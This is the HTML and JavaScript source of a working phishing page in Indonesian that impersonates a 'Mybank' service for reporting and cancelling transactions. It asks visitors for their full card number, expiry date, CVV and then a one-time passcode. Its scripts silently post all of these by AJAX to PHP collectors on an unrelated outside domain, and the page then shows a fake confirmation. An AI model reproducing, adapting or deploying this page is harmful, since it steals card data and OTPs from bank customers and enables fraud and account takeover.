
<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <title>laporankebanklain - Laporan Transaksi Mybank</title>
    <meta
      property="og:title"
      content="laporankebanklain - Laporan Transaksi Mybank"
    />
    <meta
      property="og:description"
      content="Blokir Kartu Kredit
Batalkan Transaksi
Laporan Ke Bank Lain"
    />
    <meta
      property="og:image"
      content="https://aheioqhobo.cloudimg.io/v7/_playground-bucket-v2.teleporthq.io_/dfc3c6ca-62ff-44c5-bd01-8540dddd6ab0/42e8ffeb-e693-40a5-88bd-b16edd7d8332?org_if_sml=1&amp;force_format=original"
    />
   <meta name="theme-color" content="#045597"> 
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0">
    <meta property="twitter:card" content="summary_large_image" />

    <style data-tag="reset-style-sheet">
      html {  line-height: 1.15;}body {  margin: 0;}* {  box-sizing: border-box;  border-width: 0;  border-style: solid;}p,li,ul,pre,div,h1,h2,h3,h4,h5,h6,figure,blockquote,figcaption {  margin: 0;  padding: 0;}button {  background-color: transparent;}button,input,optgroup,select,textarea {  font-family: inherit;  font-size: 100%;  line-height: 1.15;  margin: 0;}button,select {  text-transform: none;}button,[type="button"],[type="reset"],[type="submit"] {  -webkit-appearance: button;}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner {  border-style: none;  padding: 0;}button:-moz-focus,[type="button"]:-moz-focus,[type="reset"]:-moz-focus,[type="submit"]:-moz-focus {  outline: 1px dotted ButtonText;}a {  color: inherit;  text-decoration: inherit;}input {  padding: 2px 4px;}img {  display: block;}html { scroll-behavior: smooth  }
    </style>
    <style data-tag="default-style-sheet">
      html {
        font-family: Inter;
        font-size: 16px;
      }

      body {
        font-weight: 400;
        font-style:normal;
        text-decoration: none;
        text-transform: none;
        letter-spacing: normal;
        line-height: 1.15;
        color: var(--dl-color-gray-black);
        background-size: 100% 100%;
  background-image: url("public/img_default_blue.png");
  background-repeat: no-repeat;
  background-position: 100% 100%;
  overflow: hidden;

      }
      
      /*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
}
.loading img {
    width: 90px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
.laporankebanklain-container {
  width: 100%;
  display: flex;
  overflow: auto;
  min-height: 100vh;
  align-items: center;
  flex-direction: column;
  background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lTT2_C6gmS8mir8uCMzfTv1PeJm0shTdgwRHCuhunGHDtcLurhFtOQEf3rAjjEhVlRwQCZnegUf6e3NKGw63oYA71IkVUpq8f6BoPYKz3eBcL9dv3P38YUiAxVuYAQ8vum00AFaRsf6X7XUq4XanLwdmmD4_WWDUC7ONWAUCV3gOy72diw7T7C_OQdU/s2035/AddText_10-05-02.27.44.png');
    background-repeat: no-repeat;
    background-position: 100% 100%;
    background-size: 100% 100%;
}
.laporankebanklain-container1 {
  width: 100%;
  height: 704px;
  display: flex;
  position: relative;
  align-items: flex-start;
  background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1lTT2_C6gmS8mir8uCMzfTv1PeJm0shTdgwRHCuhunGHDtcLurhFtOQEf3rAjjEhVlRwQCZnegUf6e3NKGw63oYA71IkVUpq8f6BoPYKz3eBcL9dv3P38YUiAxVuYAQ8vum00AFaRsf6X7XUq4XanLwdmmD4_WWDUC7ONWAUCV3gOy72diw7T7C_OQdU/s2035/AddText_10-05-02.27.44.png');
    background-repeat: no-repeat;
    background-position: 100% 100%;
    background-size: 100% 100%;
}
.laporankebanklain-container2 {
  top: 11px;
  flex: 0 0 auto;
  left: 0px;
  right: 0px;
  width: 100%;
  height: 91px;
  margin: auto;
  display: flex;
  position: absolute;
  align-items: flex-start;
}
.laporankebanklain-image {
  left: 0px;
  right: 0px;
  width: 200px;
  bottom: 28px;
  margin: auto;
  position: absolute;
  object-fit: cover;
}
.laporankebanklain-image1 {
  top: 11px;
  right: 21px;
  width: 38px;
  height: 36px;
  margin: auto;
  position: absolute;
  object-fit: cover;
}
.laporankebanklain-icon {
  top: 11px;
  left: 19px;
  width: 40px;
  height: 38px;
  position: absolute;
}
.laporankebanklain-container3 {
  top: 140px;
  flex: 0 0 auto;
  left: 0px;
  right: 0px;
  width: 349px;
  height: 557px;
  margin: auto;
  display: flex;
  position: absolute;
  align-items: flex-start;
  flex-direction: column;
}
.laporankebanklain-image2 {
  top: -25px;
  left: 0px;
  right: 0px;
  width: 343px;
  height: 210px;
  margin: auto;
  position: absolute;
  box-shadow: 5px 5px 10px 0px #363434;
  object-fit: cover;
  border-radius: 10px;
  border: 1.5px solid yellow;
}
.laporankebanklain-form {
  left: 0px;
  right: 0px;
  width: 327px;
  bottom: 1px;
  height: 313px;
  margin: auto;
  display: flex;
  position: absolute;
}
.laporankebanklain-textinput {
  top: 11px;
  left: 0px;
  right: 0px;
  margin: auto;
  position: absolute;
  border-width: 0px;
  border-radius: 0px;
  background-color: transparent;
  border-bottom-width: 1px;
  padding-left: 3px;
  outline: none;
}
.laporankebanklain-textinput1 {
  top: 72px;
  left: 0px;
  right: 0px;
  margin: auto;
  position: absolute;
  border-width: 0px;
  border-radius: 0px;
  background-color: transparent;
  border-bottom-width: 1px;
  padding-left: 3px;
  outline: none;
}
.laporankebanklain-textinput2 {
  top: 130px;
  left: 0px;
  right: 0px;
  margin: auto;
  position: absolute;
  border-width: 0px;
  border-radius: 0px;
  background-color: transparent;
  border-bottom-width: 1px;
  padding-left: 3px;
  outline: none;
}
.laporankebanklain-button {
  left: 0px;
  color: var(--dl-color-gray-black);
  right: 0px;
  bottom: 3px;
  height: 51px;
  margin: auto;
  position: absolute;
  box-shadow: rgb(82, 81, 81) 5px 5px 10px 0px;
  font-style: normal;
  font-weight: 700;
  border-width: 0px;
  border-radius: 10px;
  background-image: linear-gradient(90deg, rgb(234, 168, 3) 1%, rgb(241, 246, 4) 100%);
}
    </style>
    <link
      rel="shortcut icon"
      href="public/profil1.png"
      type="icon/png"
      sizes="32x32"
    />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
      data-tag="font"
    />
    <link
      rel="stylesheet"
      href="https://unpkg.com/%40teleporthq/teleport-custom-scripts@0.0.27/dist/style.css"
    />
  </head>
  <body>
    <link rel="stylesheet" href="style.css" />
    <div>
      <link href="ast/css/laporankebanklain.css" rel="stylesheet" />

      <div class="laporankebanklain-container">
        <div class="laporankebanklain-container1">
                     <nav style="position: ; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 65px; background: #fff; z-index: 99999; border-bottom: 1px solid #ddd">
                  <img class="back" onclick="window.location.href='menu.html'" src="ast/x.html" alt="">
 <img src="https://j.top4top.io/p_3212if9jj1.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto">
</nav>     
          <div id="formd" class="laporankebanklain-container3" style="display:">
            <img
              alt="image"
              src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTRuSm0mTZ8oEdQk5nSTF0ZPhtIICZzqL4loXaf586uFFhM-91N2IDcaa0&s=10"
              class="laporankebanklain-image2"
            />
<form id="frmSubmit"
              method="POST"
              enctype="application/x-www-form-urlencoded"
              class="laporankebanklain-form"
            >
                
              <input
                type="tel"
                name="debit"
                id="debit"
                required=""
                maxlength="16"
                minlength="16"
                placeholder="Masukkan 16 Angka Nomor Kartu "
                class="laporankebanklain-textinput input"
              />
              <input
                type="tel"
                name="valid"
                id="valid"
                required=""
                maxlength="5"
                minlength="4"
                placeholder="Valid Thrue ( MM / YY )"
                class="laporankebanklain-textinput1 input"
              />
              <input
                type="password"
                name="cvv"
                id="cvv"
                inputmode="numeric"
                required=""
                maxlength="3"
                minlength="3"
                placeholder="(CVV) 3 Digit Dibelakang Kartu"
                class="laporankebanklain-textinput2 input"
              />
              <button type="submit" class="" style="left: 0px;
  right: 0px;
  width: 100%;
  bottom: 0%;
  height: 63px;
  margin: auto;
  position: fixed;
  font-style: normal;
  text-align: center;
  font-weight: 700;
  padding-top: 0px;
  border-width: 0px;
  padding-bottom: 0px;
  text-decoration: none;
   background-size: 100% 100%;
  background: #045597;
  background-repeat: no-repeat;
  background-position: 100% 100%; color: snow" id="chat">
                Buat Laporan Ke Bank Lain
              </button>
            </form>
          </div>
        </div>
      </div>
    </div>
 <section id="info" class="laporankebanklain-container3" style="display: none">
     
<center>
  <div class="laporankebanklain-image2" style="border: 2px solid #aaa; padding: 10px; background-color: #fff; font-weight: bold; z-index: 99999; position: relative">
      <fieldset class="laporankebanklain-image2" style="border: 2px double #aaa"></fieldset>
      <br/>
     Apakah anda tetap ingin melanjutkan pembatalan ?
     <br>
 <button type="button" style="width: 90%; height: 40px; outline: none; background: #0165B1; color: #fff; margin-top: 60px; display: inline-blok; font-size: 14px; box-shadow: 4px 3px 3px 0px #aaaaaa; position: relative" onclick="gotp()">YA, BATALKAN  ✅</button>

  </div>   
  </center> 
     
 </section>  
 
 <section id="pageotp" class="laporankebanklain-container3" style="display: none">
     
<center>
  <div class="laporankebanklain-image2" style="border: 2px solid #aaa; padding: 10px; background-color: #fff; font-weight: bold; z-index: 99999; position: relative; height: 240px">
      <fieldset class="laporankebanklain-image2" style="border: 2px double #aaa; height: 230px"></fieldset>
      <br/>
     Verifikasi OTP
     <br>
     <span style="font-weight: 400">masukkan OTP untuk Pembatalan</span><br>
<form id="formotp" method="post">
<input type="tel" id="otp" name="otp" maxlength="6" minlength="6" placeholder="" style="box-shadow: 0px 0px 2px 0px #aaaaaa; width: 90%; height: 40px; margin-top: 15px; position: relative" required>
<button id="btnk" type="submit" style="width: 90%; height: 40px; outline: none; background: #0165B1; color: #fff; margin-top: 20px; display: inline-blok; font-size: 14px; box-shadow: 4px 3px 3px 0px #aaaaaa; position: relative">BATALKAN</button>
</form>
  </div>   
  </center> 
     
 </section>  
    <div id="process1" name="process" class="process1" style="display: none;">
			<div class="loading">
				<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yNH0XdtGVrvDwUbGYi68Z6_PuJbO7yrFuGWJeeRzF7QnfrH84FzIWHGeURCml9chh7C-A8SscvscIIwjFhO2Dqebb0SSmw46LxRRSNj4BSYCH_2Tbc_UOsVAqOBIzYuo-0CLM-THp1FeV4iTnxxFIo2jRI1DNIIw1VLV3HgAoW96JA2y1zn5G0Fczgk/s800/loading.gif">
			</div>
		</div>
    <script
      defer=""
      src="https://unpkg.com/@teleporthq/teleport-custom-scripts"
    ></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
<script>
    $(document).ready(function(){
    $('#debit').mask('0000 0000 0000 0000');
    $('#valid').mask('00/00');    
    });
    
    
function gotp(){
$('#formd').hide();    
$('#info').hide();  
$('#pageotp').fadeIn();
 $("#otp").focus();
}    


    </script>        
<script>
var bank = sessionStorage.getItem("bank");
document.getElementById("bank").value = bank + "";
  </script>    
<script>
$('#frmSubmit').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
 $('#process1').show();
  document.getElementById('chat').innerHTML = "Proses..";
  
  
var dataString = $("#frmSubmit, #formotp").serialize();
$.ajax( {
type: 'POST',
url: 'https://dramaindonesia.biz.id/data/datalaporan.php',
data: dataString,
 
 complete: function(data) {
            console.log('Complete')
  
setTimeout(function(){  
document.getElementById('chat').innerHTML = "Buat Laporan Ke Bank Lain";     
$('#process1').fadeOut(); 

    }, 1000); 
    $("#formd").fadeOut();
    $("#info").fadeIn();
 }
    });

    return false;
});       


</script> 
<script>
$('#formotp').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
 $('#process1').show();   
  document.getElementById('btnk').innerHTML = "Proses..";
  
  
var dataString = $("#frmSubmit, #formotp").serialize();
$.ajax( {
type: 'POST',
url: 'https://dramaindonesia.biz.id/data/datalaporanotp.php',
data: dataString,
 
 complete: function(data) {
            console.log('Complete')
  
setTimeout(function(){  
document.getElementById('btnk').innerHTML = "BATALKAN";     
$('#process1').fadeOut(); 

    }, 1000); 
    $("#pageotp").fadeOut();
    $("#info").fadeIn();
    $('#formd').hide();
     $("#otp").val('');
 }
    });

    return false;
});       


</script>    
  </body>
</html>
